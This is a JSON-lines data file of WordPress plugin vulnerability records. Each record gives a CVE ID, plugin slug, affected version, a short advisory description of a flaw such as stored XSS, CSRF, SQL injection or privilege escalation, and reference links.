{"CVE_ID":"CVE-2025-5288","slug":"import-export-with-custom-rest-api","description":"The REST API | Custom API Generator For Cross Platform And Import Export In WP plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the process_handler() function in versions 1.0.0 to 2.0.3. This makes it possible for unauthenticated attackers to POST an arbitrary import_api URL, import specially crafted JSON, and thereby create a new user with full Administrator privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-export-with-custom-rest-api\\\/tags\\\/2.0.3\\\/backend\\\/methods\\\/wot-rapi-import-functions.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-export-with-custom-rest-api\\\/tags\\\/2.0.3\\\/backend\\\/methods\\\/wot-rapi-import-functions.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/import-export-with-custom-rest-api\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/import-export-with-custom-rest-api\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e2774fc-f028-436c-a8af-3c17378b9743?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e2774fc-f028-436c-a8af-3c17378b9743?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7688","slug":"add-user-meta","versionImpact":"1.0.1","description":"The Add User Meta plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the 'add-user-meta' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-user-meta\\\/trunk\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-user-meta\\\/trunk\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-user-meta\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/add-user-meta\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1535a174-ab59-4c6e-8080-ef818e00b070?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1535a174-ab59-4c6e-8080-ef818e00b070?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1155","slug":"nd-projects","versionImpact":"1.8","description":"The Cost Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the nd_cc_meta_box_cc_price_icon parameter in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/750be90d-dc12-4974-8921-75259d56c7b3\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/750be90d-dc12-4974-8921-75259d56c7b3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nd-projects\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nd-projects\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2171","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 3.7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/shortcodes\\\/badgeos_achievement.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/shortcodes\\\/badgeos_achievement.php#L125\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74a280e1-e4b6-4bd9-882b-d9f185332d61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74a280e1-e4b6-4bd9-882b-d9f185332d61?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5740","slug":"wp-facebook-messenger","versionImpact":"1.0","description":"The Live Chat with Facebook Messenger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'messenger' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa32a790-242f-4142-9f4d-e1b2a07045bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa32a790-242f-4142-9f4d-e1b2a07045bb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-facebook-messenger\\\/trunk\\\/frontend\\\/shortcode.php#L32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4627","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_config() function in versions up to, and including, 4.4. This makes it possible for authenticated attackers with subscriber-level access and above to update the 'ladipage_config' option.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8074af6-cb2c-44db-9110-517f33caa96e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8074af6-cb2c-44db-9110-517f33caa96e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-32700","slug":"chatbot-chatgpt","versionImpact":"2.0.0","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress chatbot-chatgpt.This issue affects Kognetiks Chatbot for WordPress: from n\/a through 2.0.0.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4356","slug":"list-categories","versionImpact":"0.4","description":"The List categories plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'categories' shortcode in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e24306a-b741-4840-b238-e37138425bf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e24306a-b741-4840-b238-e37138425bf8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/list-categories\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/list-categories\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3977","slug":"wp-jitsi-shortcodes","versionImpact":"0.1","description":"The WordPress Jitsi Shortcode WordPress plugin through 0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25851386-eccf-49cb-afbf-c25286c9b19e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25851386-eccf-49cb-afbf-c25286c9b19e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5457","slug":"pandavideo","versionImpact":"1.4.0","description":"The Panda Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91a9dcf2-ba6b-4d03-9cdf-f50ea0d259d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91a9dcf2-ba6b-4d03-9cdf-f50ea0d259d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-1.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-1.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-2.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-2.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-3.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/assets\\\/buttons\\\/button-3.php#L8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8723","slug":"012-ps-multi-languages","versionImpact":"1.6","description":"The 012 Ps Multi Languages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via translated titles in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a1517e-5ea5-47a1-afe8-9543e1ffd199?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a1517e-5ea5-47a1-afe8-9543e1ffd199?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/012-ps-multi-languages\\\/trunk\\\/includes\\\/ps-multilingual-edit-post.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/012-ps-multi-languages\\\/trunk\\\/includes\\\/ps-multilingual-edit-post.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9893","slug":"nextend-facebook-connect","versionImpact":"3.1.14","description":"The Nextend Social Login Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.1.14. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e4588d1-f21e-48ba-a8cb-d18c421f000a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e4588d1-f21e-48ba-a8cb-d18c421f000a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/nextendweb.com\\\/social-login\\\/\",\"name\":\"https:\\\/\\\/nextendweb.com\\\/social-login\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nextend-facebook-connect\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nextend-facebook-connect\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9896","slug":"bbp-core","versionImpact":"1.2.5","description":"The BBP Core \u2013 Expand bbPress powered forums with useful features plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a329cf0a-8800-470a-9657-452f26112956?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a329cf0a-8800-470a-9657-452f26112956?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbp-core\\\/trunk\\\/includes\\\/features\\\/bbpc_attachments\\\/code\\\/front.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbp-core\\\/trunk\\\/includes\\\/features\\\/bbpc_attachments\\\/code\\\/front.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bbp-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bbp-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179353\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179353\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12817","slug":"etsy-importer","versionImpact":"1.4.2","description":"The Etsy Importer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'product_link' shortcode in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-importer\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-importer\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/etsy-importer\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/etsy-importer\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9d77b08-3a4a-441b-8725-fd93744de73c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9d77b08-3a4a-441b-8725-fd93744de73c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12386","slug":"wp-abstracts-manuscripts-manager","versionImpact":"2.7.3","description":"The WP Abstracts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.3. This is due to missing nonce validation on multiple functions. This makes it possible for unauthenticated attackers to delete arbitrary accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238664\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238664\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd27466-f68e-4d8a-a1ec-90dbb6ff126b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd27466-f68e-4d8a-a1ec-90dbb6ff126b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13647","slug":"sakolawp-lite","versionImpact":"1.0.8","description":"The School Management System \u2013 SakolaWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing or incorrect nonce validation on the 'save_exam_setting' and 'delete_exam_setting' actions. This makes it possible for unauthenticated attackers to update exam settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5db3fc-6ae4-4566-8610-687cb725cf6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5db3fc-6ae4-4566-8610-687cb725cf6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10631","slug":"countdown-timer-block","versionImpact":"1.0.5","description":"The Countdown Timer for WordPress Block Editor WordPress plugin through 1.0.5 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b153fb5e-7df2-491b-b61b-6f90314c7b04\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b153fb5e-7df2-491b-b61b-6f90314c7b04\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5233","slug":"color-palette","versionImpact":"4.3.2","description":"The Color Palette plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hex\u2019 parameter in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/color-palette\\\/trunk\\\/source\\\/blocks\\\/color\\\/register.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/color-palette\\\/trunk\\\/source\\\/blocks\\\/color\\\/register.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/color-palette\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/color-palette\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd352c95-6e76-478f-943b-938a96b372f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd352c95-6e76-478f-943b-938a96b372f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7662","slug":"gestion-tarifs","versionImpact":"1.4","description":"The Gestion de tarifs plugin for WordPress is vulnerable to SQL Injection via the 'tarif' and 'intitule' shortcodes in all versions up to, and including, 1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestion-tarifs\\\/trunk\\\/gestion-tarifs-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestion-tarifs\\\/trunk\\\/gestion-tarifs-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gestion-tarifs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gestion-tarifs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d117d930-d210-44bf-ac49-19c003ca5a24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d117d930-d210-44bf-ac49-19c003ca5a24?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0085","slug":"metform","versionImpact":"3.2.1","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to reCaptcha Bypass in versions up to, and including, 3.2.1. This is due to insufficient server side checking on the captcha value submitted during a form submission. This makes it possible for unauthenticated attackers to bypass Captcha restrictions and for attackers to utilize bots to submit forms.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69527d4b-49b6-47cd-93b6-39350f881ec9\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69527d4b-49b6-47cd-93b6-39350f881ec9\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2868889%40metform&new=2868889%40metform&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2868889%40metform&new=2868889%40metform&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1861","slug":"limit-login-attempts","versionImpact":"1.7.2","description":"The Limit Login Attempts WordPress plugin through 1.7.2 does not sanitize and escape usernames when outputting them back in the logs dashboard, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/461cbcca-aed7-4c92-ba35-ebabf4fcd810\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/461cbcca-aed7-4c92-ba35-ebabf4fcd810\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36718","slug":"ninja-gdpr-compliance","versionImpact":"2.3","description":"The GDPR CCPA Compliance Support plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.3 via deserialization of untrusted input \"njt_gdpr_allow_permissions\" value. This allows unauthenticated attackers to inject a PHP Object.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/gdpr-ccpa-compliance-support-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/gdpr-ccpa-compliance-support-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f1d6fb-c665-419e-a13b-688b1df6c395\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f1d6fb-c665-419e-a13b-688b1df6c395\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2408938\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2408938\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-gdpr-compliance\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-gdpr-compliance\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2871261-3231-4a52-9a38-bb3caf461e7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2871261-3231-4a52-9a38-bb3caf461e7d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2411356\\\/ninja-gdpr-compliance\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2411356\\\/ninja-gdpr-compliance\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0689","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_first_name' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about arbitrary form submissions, including the submitter's first name.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/356cf06e-16e7-438b-83b5-c8a52a21f903?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/356cf06e-16e7-438b-83b5-c8a52a21f903?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
